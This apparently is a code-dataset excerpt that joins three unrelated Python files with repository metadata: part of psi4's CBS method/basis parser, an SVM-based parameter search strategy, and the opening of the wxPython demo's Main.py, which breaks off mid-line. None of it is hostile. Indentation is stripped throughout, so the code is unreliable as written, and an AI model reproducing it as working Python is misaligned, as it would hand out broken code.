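#   _cbs_wrapper_methods(scf_wfn="scf", corl_wfn="mp2", delta_wfn="ccsd(t)")
# returns ['scf', 'mp2', 'ccsd(t)'].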
def _parse_cbs_gufunc_string(method_name):
""" A helper function that parses a ``"method/basis"`` input string
into separate method and basis components. Also handles delta corrections.
Parameters
----------
method_name : str
A ``"method/basis"`` style string defining the calculation.
Returns
-------
tuple
Tuple in the ``(method_list, basis_list)`` format, where ``method_list``
is the list of the component methods, and ``basis_list`` is the list of
basis sets forming the extrapolation for each specified method.
E.g. ``"mp2/cc-pv[tq]z+D:ccsd(t)/cc-pvtz"`` would return:
``(["mp2", "ccsd(t)"], ["cc-pv[tq]z", "cc-pvtz"])``.
"""
method_name_list = re.split(r"""\+(?=\s*[Dd]:)""", method_name)
if len(method_name_list) > 2:
raise ValidationError(
"CBS gufunc: Text parsing is only valid for a single delta, please use the CBS wrapper directly")
method_list = []
basis_list = []
for num, method_str in enumerate(method_name_list):
if (method_str.count("[") > 1) or (method_str.count("]") > 1):
raise ValidationError(f"""CBS gufunc: Too many brackets given! {method_str}""")
if method_str.count('/') != 1:
raise ValidationError(f"""CBS gufunc: All methods must specify a basis with '/'. {method_str}""")
if num > 0:
method_str = method_str.strip()
if method_str[:2].lower() != 'd:':
raise ValidationError("""CBS gufunc: Delta method must start with 'D:'.""")
else:
method_str = method_str[2:]
method, basis = method_str.split('/')
method_list.append(method)
basis_list.append(basis)
return method_list, basis_list
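# Illustrative check of the parser above (mirrors the docstring example; the
# parser is pure, so this is safe to reason about directly):
#   methods, bases = _parse_cbs_gufunc_string("mp2/cc-pv[tq]z+d:ccsd(t)/cc-pvtz")
#   methods == ["mp2", "ccsd(t)"]
#   bases   == ["cc-pv[tq]z", "cc-pvtz"]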
def _cbs_gufunc(func, total_method_name, **kwargs):
"""
A text based parser of the CBS method string. Provided to handle "method/basis"
specification of the requested calculations. Also handles "simple" (i.e.
one-method and one-basis) calls.
Parameters
----------
func : function
Function to be called (energy, gradient, frequency or cbs).
total_method_name : str
String in a ``"method/basis"`` syntax. Simple calls (e.g. ``"blyp/sto-3g"``) are
bounced out of CBS. More complex calls (e.g. ``"mp2/cc-pv[tq]z"`` or
``"mp2/cc-pv[tq]z+D:ccsd(t)/cc-pvtz"``) are expanded by `_parse_cbs_gufunc_string()`
and pushed through :py:func:`~psi4.cbs`.
Returns
-------
tuple or float
Float, or if ``return_wfn`` is specified, a tuple of ``(value, wavefunction)``.
"""
# Catch kwarg issues for all methods
kwargs = p4util.kwargs_lower(kwargs)
return_wfn = kwargs.pop('return_wfn', False)
core.clean_variables()
ptype = kwargs.pop('ptype', None)
# Make sure the molecule the user provided is the active one
molecule = kwargs.pop('molecule', core.get_active_molecule())
molecule.update_geometry()
# Sanitize total_method_name
label = total_method_name
total_method_name = total_method_name.lower()
total_method_name = total_method_name.replace(' ', '')
# Split into components
method_list, basis_list = _parse_cbs_gufunc_string(total_method_name)
# Single energy call?
single_call = len(method_list) == 1
single_call &= '[' not in basis_list[0]
single_call &= ']' not in basis_list[0]
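# Illustrative: "blyp/sto-3g" has one method and no bracketed basis, so it is
# treated as a plain single-point call below; "mp2/cc-pv[tq]z" keeps its
# brackets and falls through to the CBS machinery instead.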
if single_call:
method_name = method_list[0]
basis = basis_list[0]
# Save some global variables so we can reset them later
optstash = p4util.OptionsState(['BASIS'])
core.set_global_option('BASIS', basis)
ptype_value, wfn = func(method_name, return_wfn=True, molecule=molecule, **kwargs)
if core.get_option("SCF", "DF_INTS_IO") != "SAVE":
core.clean()
optstash.restore()
if return_wfn:
return (ptype_value, wfn)
else:
return ptype_value
# Drop out for unsupported calls
if ptype not in ["energy", "gradient", "hessian"]:
raise ValidationError("%s: Cannot extrapolate or delta correct %s yet." % (ptype.title(), ptype))
# Catch kwarg issues for CBS methods only
user_dertype = kwargs.pop('dertype', None)
cbs_verbose = kwargs.pop('cbs_verbose', False)
# If we are not a single call, let CBS wrapper handle it!
cbs_kwargs = {}
cbs_kwargs['ptype'] = ptype
cbs_kwargs['return_wfn'] = True
cbs_kwargs['molecule'] = molecule
cbs_kwargs['verbose'] = cbs_verbose
if user_dertype is not None:
cbs_kwargs['dertype'] = user_dertype
# Find method and basis
metadata = []
if method_list[0] in ['scf', 'hf', 'c4-scf', 'c4-hf']:
stage = {}
stage['wfn'] = method_list[0]
stage['basis'] = basis_list[0]
if 'scf_scheme' in kwargs:
stage['scheme'] = kwargs.pop('scf_scheme')
stage['stage'] = "scf"
stage['treatment'] = "scf"
else:
# _validate_cbs_inputs will produce scf stage automatically
stage = {}
stage['wfn'] = method_list[0]
stage['basis'] = basis_list[0]
if 'corl_scheme' in kwargs:
stage['scheme'] = kwargs.pop('corl_scheme')
stage['stage'] = "corl"
stage['treatment'] = "corl"
metadata.append(stage)
# "method/basis" syntax only allows for one delta correction
# via "method/basis+D:delta/basis". Maximum length of method_list is 2.
if len(method_list) == 2:
stage = {}
stage['wfn'] = method_list[1]
stage['basis'] = basis_list[1]
if 'delta_scheme' in kwargs:
stage['scheme'] = kwargs.pop('delta_scheme')
stage['stage'] = "delta1"
stage['treatment'] = "corl"
metadata.append(stage)
cbs_kwargs["cbs_metadata"] = metadata
ptype_value, wfn = cbs(func, label, **cbs_kwargs)
if return_wfn:
return (ptype_value, wfn)
else:
return ptype_value
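# Sketch of the intended flow (illustrative, following the docstring above): a
# user-level call like
#   energy("mp2/cc-pv[tq]z+d:ccsd(t)/cc-pvtz")
# reaches this module as
#   _cbs_gufunc(energy, "mp2/cc-pv[tq]z+d:ccsd(t)/cc-pvtz", ptype="energy")
# which builds the cbs_metadata list above and hands off to cbs().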
|
lothian/psi4
|
psi4/driver/driver_cbs.py
|
Python
|
lgpl-3.0
| 83,107
|
[
"CFOUR",
"Psi4"
] |
b8b84f1d4784e82177e8e9bb40a67be1e7671b38d73d91026ec94b9841e7379d
|
#! /usr/bin/env python
#import math, pdb, sys
#from numpy import *
#from numpy.linalg import *
#import random
#from copy import copy
from random import choice
from numpy import array, random, ones, zeros, sin, vstack, hstack, argmax, diag, linalg, dot, exp
#from sg import sg # Import shogun
import string, os
import pickle
import pdb
from Strategy import Strategy, OneStepStrategy
from util import *
from SineModel import SineModel5
# NOT USING THIS ANY MORE
#
# '''
# A strategy that uses the Support Vector Machine regression to
# guess which parameter vector would be good to try next. Requires
# the installation of "pysvmlight", an interface to SVM Light by
# Thorsten Joachims (http://svmlight.joachims.org/). pysvmlight is
# available here:
#
# http://bitbucket.org/wcauchois/pysvmlight
# '''
class SVMLearningStrategy(OneStepStrategy):
'''
A strategy that uses the Support Vector Machine regression to
guess which parameter vector would be good to try next. Requires
the installation of shogun-python, a python machine learning
library offering, among other things, access to libsvr.
http://www.shogun-toolbox.org/
http://www.csie.ntu.edu.tw/~cjlin/libsvm/
'''
def __init__(self, *args, **kwargs):
# call this only after popping 'ranges' arg
super(SVMLearningStrategy, self).__init__(*args, **kwargs)
self.pickle = True
if 'pickle' in kwargs:
self.pickle = kwargs['pickle']
if self.pickle:
self.randStr = ''.join(choice(string.ascii_letters) for ii in range(6))
filename = 'svmstate_%s_000.pkl' % (self.randStr)
print 'SVMLearningStrategy saving itself as files like', filename
########################
# Strategy parameters
########################
# Number of points to add to the initial point to try before learning
N_init_neighborhood = 7
# Initial noise to add to the initial point to generate the
# N_init_neighborhood points
initialNoise = .1
# How close to search around the best point, in terms of a
# fraction of the range in each dimension
self.exploreScale = .01
# How many nearby points to check
self.numNearby = 100
# How much random noise to add to the next trial (might
# prevent model collapse)
self.bumpBy = .01
# If the best predicted distance is below this, then bump by
# self.lowDistBump instead of self.bumpBy
self.lowDistThresh = 5.0
# How much random noise to add to the next trial if we're getting nowhere
self.lowDistBump = .1
# Only use the last trainOnLast runs for training, instead of
# training on all data.
self.trainOnLast = 6
########################
# SVR parameters
########################
self.width = 2.1
#self.width = .1
#self.width = .03
#self.C=1.2
#self.C=.5 # tried this a few times, repetitive runs
#self.C=.04
self.C=500. # barely gets training on 8 perfect
self.C=1000. # maybe try this?
# SVR termination criteria
self.tube_epsilon=1e-3
# self.current is defined in Strategy constructor
# Populate toTry with some points
self.toTry = array(self.current)
for ii in range(N_init_neighborhood):
#row = randUniformPoint(self.ranges)
row = randGaussianPoint(self.current, self.ranges, initialNoise)
self.toTry = vstack((self.toTry, row))
self.X = None
self.y = None
def _getNext(self):
'''Get the next point to try. The first few times this will
return a random point near the initialPoint, and after that it
will return the best predicted point by the learning model,
perhaps with some added noise.'''
if self.toTry.shape[0] == 0:
# We're out of things to try. Make more.
# 1. Learn
self.train()
# 2. Try some nearby values
for ii in xrange(self.numNearby):
row = array(randGaussianPoint(self.bestState, self.ranges, self.exploreScale))
if ii == 0:
nearbyPoints = row
else:
nearbyPoints = vstack((nearbyPoints, row))
predictions = self.predict(nearbyPoints)
#print 'nearbyPoints', nearbyPoints
#print 'predictions', predictions
# 3. Pick best one
iiMax = argmax(predictions)
self.toTry = array([nearbyPoints[iiMax, :]])
# Testing hack... this should be disabled
#self.toTry = array([randUniformPoint(self.ranges)])
# Prints the most promising vector found and its predicted value
print ' value for best', prettyVec(self.bestState),
print 'p: %.2f, a: %.2f' % (self.predict(self.bestState),
self.bestDist)
print ' most promising', prettyVec(self.toTry[0,:]), 'pred: %.2f' % predictions[iiMax]
# 4. (optional) Add a little noise (or a lot of noise)
if predictions[iiMax] < self.lowDistThresh:
extraStr = '+'
bumpBy = self.lowDistBump
else:
extraStr = ' '
bumpBy = self.bumpBy
bump = randGaussianPoint(zeros(self.toTry.shape[1]),
self.ranges, bumpBy, crop=False)
self.toTry += bump
print ' %snoisy promising' % extraStr, prettyVec(self.toTry[0,:]),
print 'pred: %.2f' % self.predict(self.toTry[0,:])
self.current = self.toTry[0,:]
return self.current
def updateResults(self, dist):
'''This must be called for the last point that was handed out!
Once called, we remove the first point from self.toTry and add
it to self.X and add the distance to self.y
'''
# MAKE SURE TO CALL super().updateResults!
super(SVMLearningStrategy, self).updateResults(dist)
dist = float(dist)
justTried = self.toTry[0,:]
self.toTry = self.toTry[1:,:]
if self.X is None:
self.X = justTried
self.y = array(dist)
else:
self.X = vstack((self.X, justTried))
self.y = hstack((self.y, array(dist)))
if self.pickle:
self.saveAndCleanup()
def train(self):
'''Learn a model from self.X and self.y'''
# Constants pulled from <shogun>/examples/documented/python/regression_libsvr.py
size_cache=10
# map each dimension of self.X to [0,1]
unif = phys2unif(self.X, self.ranges)
train_X = unif.T
train_y = self.y
train_X = train_X[:,-self.trainOnLast:]
train_y = train_y[-self.trainOnLast:]
sg('set_features', 'TRAIN', train_X)
#sg('set_kernel', 'GAUSSIAN', 'REAL', size_cache, self.width)
sg('set_kernel', 'LINEAR', 'REAL', size_cache)
sg('set_labels', 'TRAIN', train_y)
sg('new_regression', 'LIBSVR')
sg('svr_tube_epsilon', self.tube_epsilon)
sg('c', self.C)
sg('train_regression')
def predict(self, testPoints):
'''Predicts performance using previously learned model.
self.train() must be called before this!'''
if len(testPoints.shape) < 2:
testPoints = array([testPoints])
sg('set_features', 'TEST', phys2unif(testPoints,self.ranges).T)
predictions = sg('classify')
return predictions
def plot(self):
from matplotlib.pyplot import plot, show, savefig, xlabel, ylabel
plot(self.y)
xlabel('Iteration')
ylabel('Fitness (arbitrary units)')
savefig('svm_sim_results.eps')
savefig('svm_sim_results.png')
show()
def saveAndCleanup(self):
filename = 'svmstate_%s_%03d.pkl' % (self.randStr, self.iterations)
ff = open(filename, 'w')
pickle.dump(self, ff)
ff.close()
if self.iterations > 1:
lastIt = self.iterations-1
if (lastIt & (lastIt - 1)) != 0:
# if last one wasn't a power of two
filenameLast = 'svmstate_%s_%03d.pkl' % (self.randStr, lastIt)
os.remove(filenameLast)
def logHeader(self):
filename = 'svmstate_%s_000.pkl' % (self.randStr)
return '# SVMLearningStrategy saving itself as files like %s\n' % filename
#
# [JBY] The following is just code for testing the SVM/SVR learning
# capabilities.
#
def dummyObjective(X):
'''A dummy objective that can be used to test learning strategies.
Intended for vectors X whose components are in or close to
[-1, 1].
'''
# Promote to float64 datatype
X = X * ones(len(X))
ret = 0.0
ret += sum(X)
ret += sum(sin(X/20))
return ret
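# Quick sanity check (illustrative): dummyObjective(array([0.5, 0.5]))
# = (0.5 + 0.5) + 2*sin(0.025) ~= 1.05, since sin(x) ~= x for small x.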
def dummyObjectiveGauss(X, center, ranges):
'''A dummy objective that can be used to test learning strategies.
Fitness is 100 times an unnormalized Gaussian bump centered at
*center*, with a diagonal covariance derived from *ranges*.
'''
covar = diag([((x[1]-x[0])*.2) ** 2 for x in ranges])
cinv = linalg.inv(covar)
return 100. * exp(-dot(dot((X-center), cinv), (X-center)))
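# Sanity check (illustrative): the exponent vanishes at X == center, so
# dummyObjectiveGauss(center, center, ranges) == 100.0 exactly, and fitness
# decays toward 0 as X moves away from center on the scale set by ranges.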
def syntheticData(points = 10, dim = 3, fn = dummyObjective):
'''Generate the requested number of data points from a function.
Returns data of the form:
[
(<label>, [(<feature>, <value>), ...]),
(<label>, [(<feature>, <value>), ...]),
...
]
'''
ret = []
for ii in range(points):
X = random.randn(dim)
y = fn(X)
ret.append( (y, [(ii+1, X[ii]) for ii in range(len(X))]) )
return ret
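# Illustrative return value (hypothetical numbers) for points=1, dim=2:
#   [(1.7, [(1, 0.83), (2, 0.91)])]
# i.e. one (label, [(feature_index, value), ...]) pair per sample, with
# 1-based feature indices as SVM-Light expects.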
def syntheticData2(points = 10, dim = 3, fn = dummyObjective):
'''Generate the requested number of data points from a function.
Returns data of the form:
(X, y), both numpy arrays
'''
ret = []
X = []
y = []
for ii in range(points):
X.append(random.randn(dim))
y.append(fn(X[-1]))
return array(X), array(y)
def main_svmlight():
# copied:
import svmlight
import pdb
training_data = syntheticData(30, 1)
test_data = syntheticData(30, 1)
#training_data = __import__('data').train0
#test_data = __import__('data').test0
print 'HERE 0'
print 'training_data is', training_data
print 'test_data is', test_data
# train a model based on the data
#pdb.set_trace()
print 'HERE 1'
model = svmlight.learn(training_data, type='regression', kernelType=2, verbosity=3)
print 'HERE 2'
# model data can be stored in the same format SVM-Light uses, for interoperability
# with the binaries.
svmlight.write_model(model, 'my_model.dat')
print 'HERE 3'
# classify the test data. this function returns a list of numbers, which represent
# the classifications.
#predictions = svmlight.classify(model, test_data)
pdb.set_trace()
predictions = svmlight.classify(model, training_data)
print 'HERE 4'
for p,example in zip(predictions, test_data):
print 'pred %.8f, actual %.8f' % (p, example[0])
def main_libsvr():
import pdb
train_X, train_y = syntheticData2(30, 1)
test_X, test_y = syntheticData2(20, 1)
train_X = train_X.T
test_X = test_X.T
print 'Trying LibSVR'
size_cache=10
width=2.1
C=1.2
epsilon=1e-5
tube_epsilon=1e-2
from sg import sg
sg('set_features', 'TRAIN', train_X)
sg('set_kernel', 'GAUSSIAN', 'REAL', size_cache, width)
sg('set_labels', 'TRAIN', train_y)
sg('new_regression', 'LIBSVR')
sg('svr_tube_epsilon', tube_epsilon)
sg('c', C)
sg('train_regression')
sg('set_features', 'TEST', test_X)
predictions = sg('classify')
for pred,act in zip(predictions, test_y):
print 'pred %.8f, actual %.8f' % (pred, act)
def main():
random.seed(11)
initialPoint = randUniformPoint(SineModel5.typicalRanges)
strategy = SVMLearningStrategy(initialPoint, ranges = SineModel5.typicalRanges)
center = array([100, 2, 0, 0, 0])
obj = lambda x: dummyObjectiveGauss(x, center, SineModel5.typicalRanges)
for ii in range(120):
print
print
current = strategy.getNext()
print ' %3d trying' % ii, prettyVec(current),
simDist = obj(current)
print simDist
strategy.updateResults(simDist)
strategy.plot()
if __name__ == '__main__':
main()
|
booi/aracna
|
RobotPi/SVMStrategy.py
|
Python
|
gpl-3.0
| 12,810
|
[
"Gaussian"
] |
6ce5c3025e514e6dd186addae7ad1d02b0230819101e0e5d7bc3da3791f21c5c
|
#!/bin/env python
#----------------------------------------------------------------------------
# Name: Main.py
# Purpose: Testing lots of stuff, controls, window types, etc.
#
# Author: Robin Dunn
#
# Created: A long time ago, in a galaxy far, far away...
# Copyright: (c) 1999-2017 by Total Control Software
# Licence: wxWindows license
# Tags: phoenix-port, py3-port
#----------------------------------------------------------------------------
# FIXME List:
# * Problems with flickering related to ERASE_BACKGROUND
# and the splitters. Might be a problem with this 2.5 beta...?
# UPDATE: can't see on 2.5.2 GTK - maybe just a faster machine :)
# * Demo Code menu?
# * Annoying switching between tabs and resulting flicker
# how to replace a page in the notebook without deleting/adding?
# Where is SetPage!? tried freeze...tried reparent of dummy panel....
# AG: It looks like this issue is fixed by Freeze()ing and Thaw()ing the
# main frame and not the notebook
# TODO List:
# * UI design more professional (is the new version more professional?)
# * save file positions (new field in demoModules) (@ LoadDemoSource)
# * Update main overview
# * Why don't we move _treeList into a separate module
# =====================
# = EXTERNAL Packages =
# =====================
# In order to let a package (like AGW) be included in the wxPython demo,
# the package owner should create a sub-directory of the wxPython demo folder
# in which all the package's demos should live. In addition, the sub-folder
# should contain a Python file called __demo__.py which, when imported, should
# contain the following methods:
#
# * GetDemoBitmap: returns the bitmap to be used in the wxPython demo tree control
# in a PyEmbeddedImage format;
# * GetRecentAdditions: returns a list of demos which will be displayed under the
# "Recent Additions/Updates" tree item. This list should be a subset (or the full
# set) of the package's demos;
# * GetDemos: returns a tuple. The first item of the tuple is the package's name
# as will be displayed in the wxPython demo tree, right after the "Custom Controls"
# item. The second element of the tuple is the list of demos for the external package.
# * GetOverview: returns a wx.html-ready representation of the package's documentation.
#
# Please see the __demo__.py file in the demo/agw/ folder for an example.
# Last updated: Andrea Gavana, 20 Oct 2008, 18.00 GMT
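# A minimal __demo__.py sketch (illustrative only; see demo/agw/__demo__.py for
# a real example):
#
#     from wx.lib.embeddedimage import PyEmbeddedImage
#
#     def GetDemoBitmap():
#         return PyEmbeddedImage(...)          # icon for the demo tree control
#     def GetRecentAdditions():
#         return ['MyWidget']                  # subset of GetDemos()[1]
#     def GetDemos():
#         return ('MyPackage', ['MyWidget', 'MyOtherWidget'])
#     def GetOverview():
#         return '<html><body>MyPackage overview.</body></html>'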
import sys, os, time, traceback
import re
import shutil
from threading import Thread
from distutils.version import LooseVersion
import wx
import wx.adv
import wx.lib.agw.aui as aui
import wx.html
from wx.lib.msgpanel import MessagePanel
from wx.adv import TaskBarIcon as TaskBarIcon
from wx.adv import SplashScreen as SplashScreen
import wx.lib.mixins.inspection
import six
from six import exec_, BytesIO
from six.moves import cPickle
from six.moves import urllib
import version
# We won't import the images module yet, but we'll assign it to this
# global when we do.
images = None
# For debugging
##wx.Trap();
##print("wx.VERSION_STRING = %s (%s)" % (wx.VERSION_STRING, wx.USE_UNICODE and 'unicode' or 'ansi'))
##print("pid:", os.getpid())
##raw_input("Press Enter...")
#---------------------------------------------------------------------------
USE_CUSTOMTREECTRL = False
DEFAULT_PERSPECTIVE = "Default Perspective"
#---------------------------------------------------------------------------
# get images and demo list
from demodata import _demoPngs, _treeList
#---------------------------------------------------------------------------
_styleTable = '<h3>Window %s</h3>\n' \
'<p>This class supports the following window %s:\n' \
'<p><table bgcolor=\"#ffffff\" border cols=1>'
_eventTable = '<h3>Events</h3>\n' \
'<p>Events emitted by this class:\n' \
'<p><table bgcolor=\"#ffffff\" border cols=1>'
_appearanceTable = '<h3>Appearance</h3>\n' \
'<p>Control appearance on various platforms:\n' \
'<p><table bgcolor=\"#ffffff\" cellspacing=20>'
_styleHeaders = ["Style Name", "Description"]
_eventHeaders = ["Event Name", "Description"]
_headerTable = '<td><b>%s</b></td>'
_styleTag = '<td><tt>%s</tt></td>'
_eventTag = '<td><i>%s</i></td>'
_hexValues = '<td><font color="%s"> %s </font></td>'
_description = '<td>%s</td>'
_imageTag = '<td align=center valign=middle><a href="%s"><img src="%s" alt="%s"></a></td>'
_platformTag = '<td align=center><b>%s</b></td>'
_trunkURL = "http://docs.wxwidgets.org/trunk/"
_docsURL = _trunkURL + "classwx%s.html"
_platformNames = ["wxMSW", "wxGTK", "wxMac"]
_importList = ["wx.aui", "wx.calendar", "wx.html", "wx.media", "wx.wizard",
"wx.combo", "wx.animate", "wx.gizmos", "wx.glcanvas", "wx.grid",
"wx.richtext", "wx.stc"]
_dirWX = dir(wx)
for mod in _importList:
try:
module = __import__(mod)
except ImportError:
continue
#---------------------------------------------------------------------------
def ReplaceCapitals(string):
"""
Replaces the capital letter in a string with an underscore plus the
corresponding lowercase character.
**Parameters:**
* `string`: the string to be analyzed.
"""
newString = ""
for char in string:
if char.isupper():
newString += "_%s"%char.lower()
else:
newString += char
return newString
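# Illustrative: ReplaceCapitals("TextCtrl") -> "_text_ctrl", which is how the
# _docsURL pattern above turns a class name into its wxWidgets docs page name.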
def RemoveHTMLTags(data):
"""
Removes all the HTML tags from a string.
**Parameters:**
* `data`: the string to be analyzed.
"""
p = re.compile(r'<[^<]*?>')
return p.sub('', data)
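# Illustrative: RemoveHTMLTags("<p>Hello <b>world</b></p>") -> "Hello world";
# the non-greedy pattern strips each tag but leaves the text between them.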
def FormatDocs(keyword, values, num):
names = list(values.keys())
names.sort()
headers = (num == 2 and [_eventHeaders] or [_styleHeaders])[0]
table = (num == 2 and [_eventTable] or [_styleTable])[0]
if num == 3:
text = "<br>" + table%(keyword.lower(), keyword.lower()) + "\n<tr>\n"
else:
text = "<br>" + table
for indx in range(2):
text += _headerTable%headers[indx]
text += "\n</tr>\n"
for name in names:
text += "<tr>\n"
description = values[name].strip()
pythonValue = name.replace("wx", "wx.")
if num == 3:
colour = "#ff0000"
value = "Unavailable"
cutValue = pythonValue[3:]
if cutValue in _dirWX:
try:
val = eval(pythonValue)
value = "%s"%hex(val)
colour = "#0000ff"
except AttributeError:
value = "Unavailable"
else:
for packages in _importList:
if cutValue in dir(eval(packages)):
val = eval("%s.%s"%(packages, cutValue))
value = "%s"%hex(val)
colour = "#0000ff"
pythonValue = "%s.%s"%(packages, cutValue)
break
text += _styleTag%pythonValue + "\n"
else:
text += _eventTag%pythonValue + "\n"
text += _description%FormatDescription(description) + "\n"
text += "</tr>\n"
text += "\n</table>\n\n<p>"
return text
def FormatDescription(description):
"""
Formats a wxWidgets C++ description in a more wxPython-based way.
**Parameters:**
* `description`: the string description to be formatted.
"""
description = description.replace("wx", "wx.")
description = description.replace("EVT_COMMAND", "wxEVT_COMMAND")
description = description.replace("wx.Widgets", "wxWidgets")
return description
def FormatImages(appearance):
text = "<p><br>" + _appearanceTable
for indx in range(2):
text += "\n<tr>\n"
for key in _platformNames:
if indx == 0:
src = appearance[key]
alt = key + "Appearance"
text += _imageTag%(src, src, alt)
else:
text += _platformTag%key
text += "</tr>\n"
text += "\n</table>\n\n<p>"
return text
def FindWindowStyles(text, originalText, widgetName):
"""
Finds the windows styles and events in the input text.
**Parameters:**
* `text`: the wxWidgets C++ docs for a particular widget/event, stripped
of all HTML tags;
* `originalText`: the wxWidgets C++ docs for a particular widget/event, with
all HTML tags.
"""
winStyles, winEvents, winExtra, winAppearance = {}, {}, {}, {}
inStyle = inExtra = inEvent = False
for line in text:
if "following styles:" in line:
inStyle = True
continue
elif "Event macros" in line:
inEvent = True
continue
if "following extra styles:" in line:
inExtra = True
continue
if "Appearance:" in line:
winAppearance = FindImages(originalText, widgetName)
continue
elif not line.strip():
inStyle = inEvent = inExtra = False
continue
if inStyle:
start = line.index(':')
windowStyle = line[0:start]
styleDescription = line[start+1:]
winStyles[windowStyle] = styleDescription
elif inEvent:
start = line.index(':')
eventName = line[0:start]
eventDescription = line[start+1:]
winEvents[eventName] = eventDescription
elif inExtra:
start = line.index(':')
styleName = line[0:start]
styleDescription = line[start+1:]
winExtra[styleName] = styleDescription
return winStyles, winEvents, winExtra, winAppearance
def FindImages(text, widgetName):
"""
When the wxWidgets docs contain the control appearance (a screenshot of the
control), this method will try to download the images.
**Parameters:**
* `text`: the wxWidgets C++ docs for a particular widget/event, with
all HTML tags.
"""
winAppearance = {}
start = text.find("class='appearance'")
if start < 0:
return winAppearance
imagesDir = GetDocImagesDir()
end = text.find("</table>", start)  # search from the appearance anchor, not from 0
text = text[start:end]
split = text.split()
for indx, items in enumerate(split):
if "src=" in items:
possibleImage = items.replace("src=", "").strip()
possibleImage = possibleImage.replace('"', "")
f = urllib.request.urlopen(_trunkURL + possibleImage)
stream = f.read()
elif "alt=" in items:
plat = items.replace("alt=", "").replace("'", "").strip()
path = os.path.join(imagesDir, plat, widgetName + ".png")
if not os.path.isfile(path):
image = wx.ImageFromStream(BytesIO(stream))
image.SaveFile(path, wx.BITMAP_TYPE_PNG)
winAppearance[plat] = path
return winAppearance
#---------------------------------------------------------------------------
# Set up a thread that will scan the wxWidgets docs for window styles,
# events and widgets screenshots
class InternetThread(Thread):
""" Worker thread class to attempt connection to the internet. """
def __init__(self, notifyWindow, selectedClass):
Thread.__init__(self)
self.notifyWindow = notifyWindow
self.selectedClass = selectedClass
self.keepRunning = True
self.setDaemon(True)
self.start()
def run(self):
""" Run the worker thread. """
# This is the code executing in the new thread. Simulation of
# a long process as a simple urllib call
try:
url = _docsURL % ReplaceCapitals(self.selectedClass)
fid = urllib.request.urlopen(url)
if six.PY2:
originalText = fid.read()
else:
originalText = fid.read().decode("utf-8")
text = RemoveHTMLTags(originalText).split("\n")
data = FindWindowStyles(text, originalText, self.selectedClass)
if not self.keepRunning:
return
wx.CallAfter(self.notifyWindow.LoadDocumentation, data)
except (IOError, urllib.error.HTTPError):
# Unable to get to the internet
t, v = sys.exc_info()[:2]
message = traceback.format_exception_only(t, v)
wx.CallAfter(self.notifyWindow.StopDownload, message)
except:
# Some other strange error...
t, v = sys.exc_info()[:2]
message = traceback.format_exception_only(t, v)
wx.CallAfter(self.notifyWindow.StopDownload, message)
#---------------------------------------------------------------------------
# Show how to derive a custom wxLog class
class MyLog(wx.Log):
def __init__(self, textCtrl, logTime=0):
wx.Log.__init__(self)
self.tc = textCtrl
self.logTime = logTime
def DoLogText(self, message):
if self.tc:
self.tc.AppendText(message + '\n')
#---------------------------------------------------------------------------
# A class to be used to display source code in the demo. Try using the
# wxSTC in the StyledTextCtrl_2 sample first, fall back to wxTextCtrl
# if there is an error, such as the stc module not being present.
#
try:
##raise ImportError # for testing the alternate implementation
from wx import stc
from StyledTextCtrl_2 import PythonSTC
class DemoCodeEditor(PythonSTC):
def __init__(self, parent, style=wx.BORDER_NONE):
PythonSTC.__init__(self, parent, -1, style=style)
self.SetUpEditor()
# Some methods to make it compatible with how the wxTextCtrl is used
def SetValue(self, value):
# if wx.USE_UNICODE:
# value = value.decode('iso8859_1')
val = self.GetReadOnly()
self.SetReadOnly(False)
self.SetText(value)
self.EmptyUndoBuffer()
self.SetSavePoint()
self.SetReadOnly(val)
def SetEditable(self, val):
self.SetReadOnly(not val)
def IsModified(self):
return self.GetModify()
def Clear(self):
self.ClearAll()
def SetInsertionPoint(self, pos):
self.SetCurrentPos(pos)
self.SetAnchor(pos)
def ShowPosition(self, pos):
line = self.LineFromPosition(pos)
#self.EnsureVisible(line)
self.GotoLine(line)
def GetLastPosition(self):
return self.GetLength()
def GetPositionFromLine(self, line):
return self.PositionFromLine(line)
def GetRange(self, start, end):
return self.GetTextRange(start, end)
def GetSelection(self):
return self.GetAnchor(), self.GetCurrentPos()
def SetSelection(self, start, end):
self.SetSelectionStart(start)
self.SetSelectionEnd(end)
def SelectLine(self, line):
start = self.PositionFromLine(line)
end = self.GetLineEndPosition(line)
self.SetSelection(start, end)
def SetUpEditor(self):
"""
This method carries out the work of setting up the demo editor.
It's separate so as not to clutter up the init code.
"""
import keyword
self.SetLexer(stc.STC_LEX_PYTHON)
self.SetKeyWords(0, " ".join(keyword.kwlist))
# Enable folding
self.SetProperty("fold", "1" )
# Highlight tab/space mixing (shouldn't be any)
self.SetProperty("tab.timmy.whinge.level", "1")
# Set left and right margins
self.SetMargins(2,2)
# Set up the numbers in the margin for margin #1
self.SetMarginType(1, wx.stc.STC_MARGIN_NUMBER)
# Reasonable value for, say, 4-5 digits using a mono font (40 pix)
self.SetMarginWidth(1, 40)
# Indentation and tab stuff
self.SetIndent(4)               # Prescribed indent size for wx
self.SetIndentationGuides(True) # Show indent guides
self.SetBackSpaceUnIndents(True)# Backspace unindents rather than delete 1 space
self.SetTabIndents(True) # Tab key indents
self.SetTabWidth(4)             # Prescribed tab size for wx
self.SetUseTabs(False) # Use spaces rather than tabs, or
# TabTimmy will complain!
# White space
self.SetViewWhiteSpace(False) # Don't view white space
# EOL: Since we are loading/saving ourselves, and the
# strings will always have \n's in them, set the STC to
# edit them that way.
self.SetEOLMode(wx.stc.STC_EOL_LF)
self.SetViewEOL(False)
# No right-edge mode indicator
self.SetEdgeMode(stc.STC_EDGE_NONE)
# Setup a margin to hold fold markers
self.SetMarginType(2, stc.STC_MARGIN_SYMBOL)
self.SetMarginMask(2, stc.STC_MASK_FOLDERS)
self.SetMarginSensitive(2, True)
self.SetMarginWidth(2, 12)
# and now set up the fold markers
self.MarkerDefine(stc.STC_MARKNUM_FOLDEREND, stc.STC_MARK_BOXPLUSCONNECTED, "white", "black")
self.MarkerDefine(stc.STC_MARKNUM_FOLDEROPENMID, stc.STC_MARK_BOXMINUSCONNECTED, "white", "black")
self.MarkerDefine(stc.STC_MARKNUM_FOLDERMIDTAIL, stc.STC_MARK_TCORNER, "white", "black")
self.MarkerDefine(stc.STC_MARKNUM_FOLDERTAIL, stc.STC_MARK_LCORNER, "white", "black")
self.MarkerDefine(stc.STC_MARKNUM_FOLDERSUB, stc.STC_MARK_VLINE, "white", "black")
self.MarkerDefine(stc.STC_MARKNUM_FOLDER, stc.STC_MARK_BOXPLUS, "white", "black")
self.MarkerDefine(stc.STC_MARKNUM_FOLDEROPEN, stc.STC_MARK_BOXMINUS, "white", "black")
# Global default style
if wx.Platform == '__WXMSW__':
self.StyleSetSpec(stc.STC_STYLE_DEFAULT,
